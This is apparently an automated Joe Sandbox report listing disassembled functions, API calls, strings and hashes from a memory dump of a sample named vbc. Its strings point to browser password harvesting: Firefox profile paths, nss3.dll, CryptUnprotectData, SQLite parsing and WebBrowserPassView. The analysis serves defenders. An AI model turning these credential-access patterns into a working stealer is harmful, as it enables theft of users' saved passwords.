                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: 7596f6035e5ef091127183c4559ee488d1edbbf5a3ab53b239687d6f306ecbcf
                                                              • Instruction ID: a56ed1d78848c17894bc611d03527086a745bd119e00672256ad5f5daa2e3940
                                                              • Opcode Fuzzy Hash: 7596f6035e5ef091127183c4559ee488d1edbbf5a3ab53b239687d6f306ecbcf
                                                              • Instruction Fuzzy Hash: 93818E706093619FDB10DF15E88161FB7E0BF98354F94885FE8849B252EB78EC44CB9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
                                                              • memset.MSVCRT ref: 00410F78
                                                              • memset.MSVCRT ref: 00410F88
                                                                • Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E
                                                              • memset.MSVCRT ref: 00411073
                                                              • wcscpy.MSVCRT ref: 00411094
                                                              • CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3300951397-0
                                                              • Opcode ID: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
                                                              • Instruction ID: ff77c4a4bb0d76b6113ba9f034b07e179d87586f5f3f4fadb46fa2bb0041fc85
                                                              • Opcode Fuzzy Hash: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
                                                              • Instruction Fuzzy Hash: CB5170B0508381AFD720DF55DC85A9BBBE8FBC8305F00492EF68882261DB74D985CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
                                                              • CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
                                                              • GetLastError.KERNEL32 ref: 00415CAD
                                                              • free.MSVCRT(?), ref: 00415CBA
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile$ErrorLastfree
                                                              • String ID:
                                                              • API String ID: 77810686-0
                                                              • Opcode ID: f66de5891193bfdf4e2e30d5be6bc07913f57c3157113eb93dd3db20a3189873
                                                              • Instruction ID: e414679dc355763f7cb5844f7b2dc3c916de6b309c6ec43d815c5638ef366406
                                                              • Opcode Fuzzy Hash: f66de5891193bfdf4e2e30d5be6bc07913f57c3157113eb93dd3db20a3189873
                                                              • Instruction Fuzzy Hash: 7741D0B1508701EFE7109F25EC4169BBBE5EFC4324F14892EF49596290E378D9848B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040D560
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,?,?), ref: 0040A0CD
                                                                • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                                • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                                • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                                • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                                • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                                • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                                • Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
                                                                • Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 1392923015-3614832568
                                                              • Opcode ID: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                              • Instruction ID: 456ec3227f593179f02471f626d387f8bd8a0122acdd439c58b7a13f613657e4
                                                              • Opcode Fuzzy Hash: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                              • Instruction Fuzzy Hash: 6131FAB1D002599BDB50EFA9D8C1AEDBBB4FF09314F10417AF508B7282DF385A458B99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 00415E2B
                                                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
                                                              • free.MSVCRT(00000000), ref: 00415E7F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: 2a5ce252e83f3258635b8cdd3f89e40332e142270d762a7f2d18c890cd89c907
                                                              • Instruction ID: de39e7dabe3dcffc9507685f2d24beb71d21f2267e90135c35d9c9407e9ebe28
                                                              • Opcode Fuzzy Hash: 2a5ce252e83f3258635b8cdd3f89e40332e142270d762a7f2d18c890cd89c907
                                                              • Instruction Fuzzy Hash: B111A236D04B05EBDB106FB498C06FF7368AA85754B54013BF911E6280D7789F8195AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00414D2B
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
                                                              • malloc.MSVCRT ref: 00414D53
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
                                                              • free.MSVCRT(?), ref: 00414D73
                                                              • free.MSVCRT(?,?), ref: 00414D91
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: a21aaa5931463aa49c56fcf8adf191ca52340c9a638789358988324125a7e72a
                                                              • Instruction ID: 75ff5f127907765bac19b59c8f0cf631f86937604d45831965c424c16304f1b7
                                                              • Opcode Fuzzy Hash: a21aaa5931463aa49c56fcf8adf191ca52340c9a638789358988324125a7e72a
                                                              • Instruction Fuzzy Hash: 3501D4725041257BAF225BB6AC41DFF369CDF857B4721022AFC04E3280EA288E4141EC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040F042
                                                              • memset.MSVCRT ref: 0040F057
                                                                • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                              • wcscat.MSVCRT ref: 0040F080
                                                                • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                              • wcscat.MSVCRT ref: 0040F0A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 3249829328-1174173950
                                                              • Opcode ID: 0792b74de92b1b8e8d6012e5e03934d8c0980be54932ee038f3de1c9ff979763
                                                              • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                              • Opcode Fuzzy Hash: 0792b74de92b1b8e8d6012e5e03934d8c0980be54932ee038f3de1c9ff979763
                                                              • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
                                                              • free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: d6dff3ce2bd59e42027674f84b7b0756ab3ea73d9dee57d863132353e6d4a54a
                                                              • Instruction ID: 407cf19e3f66aff666bf3235626637e86bc259e86a40955958787b48e693a0c3
                                                              • Opcode Fuzzy Hash: d6dff3ce2bd59e42027674f84b7b0756ab3ea73d9dee57d863132353e6d4a54a
                                                              • Instruction Fuzzy Hash: 80316831A44645DAE720EB61DCC1BFB739C9FA4348F1405BFE841D6182FE6C8EC54A19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              • memset.MSVCRT ref: 0040C129
                                                                • Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D
                                                                • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                              • _snwprintf.MSVCRT ref: 0040C173
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 2236007434-2769808009
                                                              • Opcode ID: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                              • Instruction ID: bd8afa7c54c2b984639c4d8fb182e53c6b214fce1ab7be0445daf1b4a409d2ac
                                                              • Opcode Fuzzy Hash: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                              • Instruction Fuzzy Hash: 82119132904615BFEB11AF65DC82E99BB74FF04318F10402AF9046A5E2DB75B960CBD8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040D86C
                                                                • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                              • wcsrchr.MSVCRT ref: 0040D886
                                                              • wcscat.MSVCRT ref: 0040D8A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: .cfg$General
                                                              • API String ID: 776488737-1188829934
                                                              • Opcode ID: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                              • Instruction ID: b769b6074c2bbd437ee926744873151467191c08e4afcaaf49059e595a4f98b4
                                                              • Opcode Fuzzy Hash: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                              • Instruction Fuzzy Hash: 34119877901318AADB10EF55DC45ECE7378AF48314F1041F6F518A7182DB78AA848F9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
                                                              • RegisterClassW.USER32 ref: 0040E076
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
                                                              • CreateWindowExW.USER32 ref: 0040E09C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID: WebBrowserPassView
                                                              • API String ID: 2678498856-2171583229
                                                              • Opcode ID: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                              • Instruction ID: d6937ed4ed068f8a41babfbfc400960a7e9d41ce1fcf29d78c1aeb4d070e2d0f
                                                              • Opcode Fuzzy Hash: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                              • Instruction Fuzzy Hash: 5301C4B1901629ABDB019F998D89ADFBFBCFF09B50F10421AF514A2240D7B45A408BE9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C2EB
                                                              • memset.MSVCRT ref: 0040C302
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                              • _snwprintf.MSVCRT ref: 0040C33E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                              • String ID: <%s>$<?xml version="1.0" ?>
                                                              • API String ID: 168708657-3296998653
                                                              • Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                              • Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
                                                              • Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                              • Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                              • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                              • API String ID: 145871493-1827663648
                                                              • Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                              • Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
                                                              • Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                              • Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcschr.MSVCRT ref: 00411A2D
                                                              • _snwprintf.MSVCRT ref: 00411A52
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
                                                              • GetPrivateProfileStringW.KERNEL32 ref: 00411A88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                              • Instruction ID: ae5f1e9df6cd2f4a0780795b96407545f38e06b3c9618b8e9942ee44aab69889
                                                              • Opcode Fuzzy Hash: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                              • Instruction Fuzzy Hash: 2101283240521ABAEF219F81EC05FDA3A6AFF04785F104066BA1960161D779C661EB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcscpy.MSVCRT ref: 00411DC1
                                                              • wcscpy.MSVCRT ref: 00411DDC
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                              • String ID: General
                                                              • API String ID: 999786162-26480598
                                                              • Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                              • Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
                                                              • Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                              • Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                              • _snwprintf.MSVCRT ref: 004071FE
                                                              • MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                              • Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
                                                              • Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                              • Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                              • FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 145871493-1506664499
                                                              • Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                              • Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
                                                              • Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                              • Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                              • Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
                                                              • Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                              • Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
                                                              • unknown column "%s" in foreign key definition, xrefs: 0042EFB9
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                              • Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
                                                              • Opcode Fuzzy Hash: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                              • Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: d94c602a0fcad7151453696a7bed9641505b7428802aa7a85787dc974880f6ee
                                                              • Instruction ID: bd67d5102a3eb66ea4de4e64a8b31fca419cb069452d494a6197ab8253893597
                                                              • Opcode Fuzzy Hash: d94c602a0fcad7151453696a7bed9641505b7428802aa7a85787dc974880f6ee
                                                              • Instruction Fuzzy Hash: D351D1719442149FDF10DF69C8827EAB7F4AF44314F14019BE804EB346E778EA85CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetwcslen$wcscatwcscpy
                                                              • String ID: nss3.dll
                                                              • API String ID: 1250441359-2492180550
                                                              • Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                              • Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
                                                              • Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                              • Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                              • DeleteObject.GDI32(?), ref: 0040E129
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
